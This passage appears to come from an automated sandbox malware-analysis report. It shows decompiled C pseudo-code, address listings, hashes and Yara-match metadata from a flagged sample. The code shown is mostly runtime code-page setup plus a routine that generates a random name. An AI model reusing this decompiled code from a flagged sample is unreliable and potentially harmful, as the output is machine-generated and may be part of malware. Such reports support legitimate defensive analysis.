                                                                                                                                                                                                                                                                            						_t108 = _t75;
                                                                                                                                                                                                                                                                            						if(_t75 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t95 =  *(_t93 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                            						_t76 = _t75 & 0x000000ff;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							__eflags = _t76 - _t95;
                                                                                                                                                                                                                                                                            							if(_t76 > _t95) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _t76 - 0x100;
                                                                                                                                                                                                                                                                            							if(_t76 < 0x100) {
                                                                                                                                                                                                                                                                            								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
                                                                                                                                                                                                                                                                            								_t76 = _t76 + 1;
                                                                                                                                                                                                                                                                            								__eflags = _t76;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t93 = _t93 + 2;
                                                                                                                                                                                                                                                                            						__eflags = _t93;
                                                                                                                                                                                                                                                                            						_t75 =  *_t93;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E00C7A71E(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                            					E00C7CC66(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0); // executed
                                                                                                                                                                                                                                                                            					E00C7CC66(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
                                                                                                                                                                                                                                                                            					_t94 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
                                                                                                                                                                                                                                                                            						if((_t86 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            							__eflags = _t86 & 0x00000002;
                                                                                                                                                                                                                                                                            							if((_t86 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            								 *((char*)(_t101 + _t94 + 0x119)) = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t37 = _t101 + _t94 + 0x19;
                                                                                                                                                                                                                                                                            								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
                                                                                                                                                                                                                                                                            								__eflags =  *_t37;
                                                                                                                                                                                                                                                                            								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
                                                                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
                                                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
                                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                                            							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                            					} while (_t94 < 0x100);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return E00C7DE3E(_v8 ^ _t102);
                                                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                                                            0x00c7b448
                                                                                                                                                                                                                                                                            0x00c7b453
                                                                                                                                                                                                                                                                            0x00c7b45a
                                                                                                                                                                                                                                                                            0x00c7b45f
                                                                                                                                                                                                                                                                            0x00c7b47c
                                                                                                                                                                                                                                                                            0x00c7b574
                                                                                                                                                                                                                                                                            0x00c7b57a
                                                                                                                                                                                                                                                                            0x00c7b57c
                                                                                                                                                                                                                                                                            0x00c7b57d
                                                                                                                                                                                                                                                                            0x00c7b57d
                                                                                                                                                                                                                                                                            0x00c7b57f
                                                                                                                                                                                                                                                                            0x00c7b585
                                                                                                                                                                                                                                                                            0x00c7b585
                                                                                                                                                                                                                                                                            0x00c7b587
                                                                                                                                                                                                                                                                            0x00c7b589
                                                                                                                                                                                                                                                                            0x00c7b592
                                                                                                                                                                                                                                                                            0x00c7b595
                                                                                                                                                                                                                                                                            0x00c7b5a1
                                                                                                                                                                                                                                                                            0x00c7b5a8
                                                                                                                                                                                                                                                                            0x00c7b5b8
                                                                                                                                                                                                                                                                            0x00c7b5aa
                                                                                                                                                                                                                                                                            0x00c7b5aa
                                                                                                                                                                                                                                                                            0x00c7b5ad
                                                                                                                                                                                                                                                                            0x00c7b5ad
                                                                                                                                                                                                                                                                            0x00c7b5ad
                                                                                                                                                                                                                                                                            0x00c7b5b1
                                                                                                                                                                                                                                                                            0x00c7b5b1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b5b1
                                                                                                                                                                                                                                                                            0x00c7b597
                                                                                                                                                                                                                                                                            0x00c7b597
                                                                                                                                                                                                                                                                            0x00c7b59c
                                                                                                                                                                                                                                                                            0x00c7b59c
                                                                                                                                                                                                                                                                            0x00c7b5b4
                                                                                                                                                                                                                                                                            0x00c7b5b4
                                                                                                                                                                                                                                                                            0x00c7b5b4
                                                                                                                                                                                                                                                                            0x00c7b5ba
                                                                                                                                                                                                                                                                            0x00c7b5c0
                                                                                                                                                                                                                                                                            0x00c7b5c6
                                                                                                                                                                                                                                                                            0x00c7b5c7
                                                                                                                                                                                                                                                                            0x00c7b5c7
                                                                                                                                                                                                                                                                            0x00c7b482
                                                                                                                                                                                                                                                                            0x00c7b482
                                                                                                                                                                                                                                                                            0x00c7b484
                                                                                                                                                                                                                                                                            0x00c7b484
                                                                                                                                                                                                                                                                            0x00c7b48b
                                                                                                                                                                                                                                                                            0x00c7b48c
                                                                                                                                                                                                                                                                            0x00c7b490
                                                                                                                                                                                                                                                                            0x00c7b496
                                                                                                                                                                                                                                                                            0x00c7b49c
                                                                                                                                                                                                                                                                            0x00c7b4c4
                                                                                                                                                                                                                                                                            0x00c7b4c4
                                                                                                                                                                                                                                                                            0x00c7b4c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b4a5
                                                                                                                                                                                                                                                                            0x00c7b4a9
                                                                                                                                                                                                                                                                            0x00c7b4bb
                                                                                                                                                                                                                                                                            0x00c7b4bb
                                                                                                                                                                                                                                                                            0x00c7b4bd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b4ae
                                                                                                                                                                                                                                                                            0x00c7b4b0
                                                                                                                                                                                                                                                                            0x00c7b4b2
                                                                                                                                                                                                                                                                            0x00c7b4ba
                                                                                                                                                                                                                                                                            0x00c7b4ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b4ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b4b0
                                                                                                                                                                                                                                                                            0x00c7b4bf
                                                                                                                                                                                                                                                                            0x00c7b4bf
                                                                                                                                                                                                                                                                            0x00c7b4c2
                                                                                                                                                                                                                                                                            0x00c7b4c2
                                                                                                                                                                                                                                                                            0x00c7b4de
                                                                                                                                                                                                                                                                            0x00c7b4ff
                                                                                                                                                                                                                                                                            0x00c7b527
                                                                                                                                                                                                                                                                            0x00c7b52f
                                                                                                                                                                                                                                                                            0x00c7b531
                                                                                                                                                                                                                                                                            0x00c7b531
                                                                                                                                                                                                                                                                            0x00c7b53b
                                                                                                                                                                                                                                                                            0x00c7b54b
                                                                                                                                                                                                                                                                            0x00c7b54d
                                                                                                                                                                                                                                                                            0x00c7b564
                                                                                                                                                                                                                                                                            0x00c7b54f
                                                                                                                                                                                                                                                                            0x00c7b54f
                                                                                                                                                                                                                                                                            0x00c7b54f
                                                                                                                                                                                                                                                                            0x00c7b54f
                                                                                                                                                                                                                                                                            0x00c7b554
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b554
                                                                                                                                                                                                                                                                            0x00c7b53d
                                                                                                                                                                                                                                                                            0x00c7b53d
                                                                                                                                                                                                                                                                            0x00c7b542
                                                                                                                                                                                                                                                                            0x00c7b55b
                                                                                                                                                                                                                                                                            0x00c7b55b
                                                                                                                                                                                                                                                                            0x00c7b55b
                                                                                                                                                                                                                                                                            0x00c7b56b
                                                                                                                                                                                                                                                                            0x00c7b56c
                                                                                                                                                                                                                                                                            0x00c7b570
                                                                                                                                                                                                                                                                            0x00c7b5db

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: 4e88a0024015a509b82d81a460b3012cc86ed5bf3b17541af69024e110cff7bb
                                                                                                                                                                                                                                                                            • Instruction ID: 16cd8a04727bfd9565b06060b5cd8d7b4b44acefd7abf1156224443b3b19b55d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e88a0024015a509b82d81a460b3012cc86ed5bf3b17541af69024e110cff7bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 044127705042489EDB228E25CC84BFABBBAEF45704F1444EDE59E87143D335AE45DF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                                                            			E01175930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				void _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                            					E01177B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                            					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                            					asm("movsw");
                                                                                                                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                                                                                                                            					_v56 = 0;
                                                                                                                                                                                                                                                                            					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                            						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                            						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                            						if(_v56 == 0) {
                                                                                                                                                                                                                                                                            							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x01175938
                                                                                                                                                                                                                                                                            0x01175943
                                                                                                                                                                                                                                                                            0x01175971
                                                                                                                                                                                                                                                                            0x01175986
                                                                                                                                                                                                                                                                            0x01175988
                                                                                                                                                                                                                                                                            0x0117598a
                                                                                                                                                                                                                                                                            0x0117598b
                                                                                                                                                                                                                                                                            0x0117599d
                                                                                                                                                                                                                                                                            0x011759c6
                                                                                                                                                                                                                                                                            0x011759d6
                                                                                                                                                                                                                                                                            0x011759dc
                                                                                                                                                                                                                                                                            0x011759e2
                                                                                                                                                                                                                                                                            0x011759e2
                                                                                                                                                                                                                                                                            0x011759ee
                                                                                                                                                                                                                                                                            0x0117599a
                                                                                                                                                                                                                                                                            0x0117599a
                                                                                                                                                                                                                                                                            0x0117599d
                                                                                                                                                                                                                                                                            0x011759fb

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharUpperA.USER32(00000000), ref: 011759E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • abcdefghijklmnopqrstuvwxyz, xrefs: 0117597E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CharUpper
                                                                                                                                                                                                                                                                            • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                            • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                            • Opcode ID: 9d3e7371903f0090b9663a8abccbe56e7d785313ae2b78c499c50e416862fbd1
                                                                                                                                                                                                                                                                            • Instruction ID: 45f179ddb029c6c8a91be5761fa414c0029cd6797035ef121d529be2a5539c93
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3e7371903f0090b9663a8abccbe56e7d785313ae2b78c499c50e416862fbd1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87213A31A0210DEBDF09CF98E584BEEBBB6FF85315F248565E80467381D3759A44CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                                            			E00C7B79D(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				char _v22;
                                                                                                                                                                                                                                                                            				struct _cpinfo _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                                                            				short _t58;
                                                                                                                                                                                                                                                                            				signed char _t62;
                                                                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                                                                            				signed char* _t72;
                                                                                                                                                                                                                                                                            				signed char* _t73;
                                                                                                                                                                                                                                                                            				int _t78;
                                                                                                                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                                                                                                                            				signed char* _t82;
                                                                                                                                                                                                                                                                            				short* _t83;
                                                                                                                                                                                                                                                                            				int _t87;
                                                                                                                                                                                                                                                                            				signed char _t88;
                                                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                                                            				signed int _t91;
                                                                                                                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                                                                                                                            				int _t94;
                                                                                                                                                                                                                                                                            				int _t95;
                                                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t48 =  *0xd0db44; // 0xce6c4b51
                                                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t99;
                                                                                                                                                                                                                                                                            				_t98 = _a8;
                                                                                                                                                                                                                                                                            				_t78 = E00C7B370(__eflags, _a4);
                                                                                                                                                                                                                                                                            				if(_t78 != 0) {
                                                                                                                                                                                                                                                                            					_t94 = 0;
                                                                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                                                                            					_t81 = 0;
                                                                                                                                                                                                                                                                            					_t51 = 0;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t51 + 0xd0d5b8)) - _t78;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t51 + 0xd0d5b8)) == _t78) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                            						_t51 = _t51 + 0x30;
                                                                                                                                                                                                                                                                            						_v32 = _t81;
                                                                                                                                                                                                                                                                            						__eflags = _t51 - 0xf0;
                                                                                                                                                                                                                                                                            						if(_t51 < 0xf0) {
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							__eflags = _t78 - 0xfde8;
                                                                                                                                                                                                                                                                            							if(_t78 == 0xfde8) {
                                                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								__eflags = _t78 - 0xfde9;
                                                                                                                                                                                                                                                                            								if(_t78 == 0xfde9) {
                                                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                                                                                                                                                                                                                                                            									__eflags = _t51;
                                                                                                                                                                                                                                                                            									if(_t51 == 0) {
                                                                                                                                                                                                                                                                            										goto L23;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t51 = GetCPInfo(_t78,  &_v28);
                                                                                                                                                                                                                                                                            										__eflags = _t51;
                                                                                                                                                                                                                                                                            										if(_t51 == 0) {
                                                                                                                                                                                                                                                                            											__eflags =  *0xd0df4c - _t94; // 0x0
                                                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                                                            												goto L23;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												E00C7B3E3(_t98);
                                                                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											E00C7F290(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                            											 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                            											 *(_t98 + 0x21c) = _t94;
                                                                                                                                                                                                                                                                            											_t78 = 1;
                                                                                                                                                                                                                                                                            											__eflags = _v28 - 1;
                                                                                                                                                                                                                                                                            											if(_v28 <= 1) {
                                                                                                                                                                                                                                                                            												 *(_t98 + 8) = _t94;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												__eflags = _v22;
                                                                                                                                                                                                                                                                            												_t72 =  &_v22;
                                                                                                                                                                                                                                                                            												if(_v22 != 0) {
                                                                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                                                                            														_t88 = _t72[1];
                                                                                                                                                                                                                                                                            														__eflags = _t88;
                                                                                                                                                                                                                                                                            														if(_t88 == 0) {
                                                                                                                                                                                                                                                                            															goto L16;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t91 = _t88 & 0x000000ff;
                                                                                                                                                                                                                                                                            														_t89 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                                                                                            														while(1) {
                                                                                                                                                                                                                                                                            															__eflags = _t89 - _t91;
                                                                                                                                                                                                                                                                            															if(_t89 > _t91) {
                                                                                                                                                                                                                                                                            																break;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
                                                                                                                                                                                                                                                                            															_t89 = _t89 + 1;
                                                                                                                                                                                                                                                                            															__eflags = _t89;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														_t72 =  &(_t72[2]);
                                                                                                                                                                                                                                                                            														__eflags =  *_t72;
                                                                                                                                                                                                                                                                            														if( *_t72 != 0) {
                                                                                                                                                                                                                                                                            															continue;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														goto L16;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												L16:
                                                                                                                                                                                                                                                                            												_t73 = _t98 + 0x1a;
                                                                                                                                                                                                                                                                            												_t87 = 0xfe;
                                                                                                                                                                                                                                                                            												do {
                                                                                                                                                                                                                                                                            													 *_t73 =  *_t73 | 0x00000008;
                                                                                                                                                                                                                                                                            													_t73 =  &(_t73[1]);
                                                                                                                                                                                                                                                                            													_t87 = _t87 - 1;
                                                                                                                                                                                                                                                                            													__eflags = _t87;
                                                                                                                                                                                                                                                                            												} while (_t87 != 0);
                                                                                                                                                                                                                                                                            												 *(_t98 + 0x21c) = E00C7B332( *(_t98 + 4));
                                                                                                                                                                                                                                                                            												 *(_t98 + 8) = _t78;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t95 = _t98 + 0xc;
                                                                                                                                                                                                                                                                            											asm("stosd");
                                                                                                                                                                                                                                                                            											asm("stosd");
                                                                                                                                                                                                                                                                            											asm("stosd");
                                                                                                                                                                                                                                                                            											L36:
                                                                                                                                                                                                                                                                            											E00C7B448(_t78, _t91, _t95, _t98, _t98); // executed
                                                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E00C7F290(_t94, _t98 + 0x18, _t94, 0x101);
                                                                                                                                                                                                                                                                            					_t54 = _v32 * 0x30;
                                                                                                                                                                                                                                                                            					__eflags = _t54;
                                                                                                                                                                                                                                                                            					_v36 = _t54;
                                                                                                                                                                                                                                                                            					_t55 = _t54 + 0xd0d5c8;
                                                                                                                                                                                                                                                                            					_v32 = _t55;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						__eflags =  *_t55;
                                                                                                                                                                                                                                                                            						_t82 = _t55;
                                                                                                                                                                                                                                                                            						if( *_t55 != 0) {
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_t62 = _t82[1];
                                                                                                                                                                                                                                                                            								__eflags = _t62;
                                                                                                                                                                                                                                                                            								if(_t62 == 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t92 =  *_t82 & 0x000000ff;
                                                                                                                                                                                                                                                                            								_t63 = _t62 & 0x000000ff;
                                                                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                                                                            									__eflags = _t92 - _t63;
                                                                                                                                                                                                                                                                            									if(_t92 > _t63) {
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _t92 - 0x100;
                                                                                                                                                                                                                                                                            									if(_t92 < 0x100) {
                                                                                                                                                                                                                                                                            										_t31 = _t94 + 0xd0d5b4; // 0x8040201
                                                                                                                                                                                                                                                                            										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
                                                                                                                                                                                                                                                                            										_t92 = _t92 + 1;
                                                                                                                                                                                                                                                                            										__eflags = _t92;
                                                                                                                                                                                                                                                                            										_t63 = _t82[1] & 0x000000ff;
                                                                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t82 =  &(_t82[2]);
                                                                                                                                                                                                                                                                            								__eflags =  *_t82;
                                                                                                                                                                                                                                                                            								if( *_t82 != 0) {
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t55 = _v32;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                            						_t55 = _t55 + 8;
                                                                                                                                                                                                                                                                            						_v32 = _t55;
                                                                                                                                                                                                                                                                            						__eflags = _t94 - 4;
                                                                                                                                                                                                                                                                            					} while (_t94 < 4);
                                                                                                                                                                                                                                                                            					 *(_t98 + 4) = _t78;
                                                                                                                                                                                                                                                                            					 *(_t98 + 8) = 1;
                                                                                                                                                                                                                                                                            					 *(_t98 + 0x21c) = E00C7B332(_t78);
                                                                                                                                                                                                                                                                            					_t83 = _t98 + 0xc;
                                                                                                                                                                                                                                                                            					_t91 = _v36 + 0xd0d5bc;
                                                                                                                                                                                                                                                                            					_t95 = 6;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t58 =  *_t91;
                                                                                                                                                                                                                                                                            						_t91 = _t91 + 2;
                                                                                                                                                                                                                                                                            						 *_t83 = _t58;
                                                                                                                                                                                                                                                                            						_t83 = _t83 + 2;
                                                                                                                                                                                                                                                                            						_t95 = _t95 - 1;
                                                                                                                                                                                                                                                                            						__eflags = _t95;
                                                                                                                                                                                                                                                                            					} while (_t95 != 0);
                                                                                                                                                                                                                                                                            					goto L36;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E00C7B3E3(_t98);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L39:
                                                                                                                                                                                                                                                                            				return E00C7DE3E(_v8 ^ _t99);
                                                                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                                                                            0x00c7b7a5
                                                                                                                                                                                                                                                                            0x00c7b7ac
                                                                                                                                                                                                                                                                            0x00c7b7b4
                                                                                                                                                                                                                                                                            0x00c7b7bc
                                                                                                                                                                                                                                                                            0x00c7b7c1
                                                                                                                                                                                                                                                                            0x00c7b7d2
                                                                                                                                                                                                                                                                            0x00c7b7d2
                                                                                                                                                                                                                                                                            0x00c7b7d4
                                                                                                                                                                                                                                                                            0x00c7b7d6
                                                                                                                                                                                                                                                                            0x00c7b7d8
                                                                                                                                                                                                                                                                            0x00c7b7db
                                                                                                                                                                                                                                                                            0x00c7b7db
                                                                                                                                                                                                                                                                            0x00c7b7e1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b7e7
                                                                                                                                                                                                                                                                            0x00c7b7e8
                                                                                                                                                                                                                                                                            0x00c7b7eb
                                                                                                                                                                                                                                                                            0x00c7b7ee
                                                                                                                                                                                                                                                                            0x00c7b7f3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b7f5
                                                                                                                                                                                                                                                                            0x00c7b7f5
                                                                                                                                                                                                                                                                            0x00c7b7fb
                                                                                                                                                                                                                                                                            0x00c7b8c9
                                                                                                                                                                                                                                                                            0x00c7b801
                                                                                                                                                                                                                                                                            0x00c7b801
                                                                                                                                                                                                                                                                            0x00c7b807
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b80d
                                                                                                                                                                                                                                                                            0x00c7b811
                                                                                                                                                                                                                                                                            0x00c7b817
                                                                                                                                                                                                                                                                            0x00c7b819
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b81f
                                                                                                                                                                                                                                                                            0x00c7b824
                                                                                                                                                                                                                                                                            0x00c7b82a
                                                                                                                                                                                                                                                                            0x00c7b82c
                                                                                                                                                                                                                                                                            0x00c7b8b6
                                                                                                                                                                                                                                                                            0x00c7b8bc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b8be
                                                                                                                                                                                                                                                                            0x00c7b8bf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7b8bf
                                                                                                                                                                                                                                                                            0x00c7b832
                                                                                                                                                                                                                                                                            0x00c7b83c
                                                                                                                                                                                                                                                                            0x00c7b841
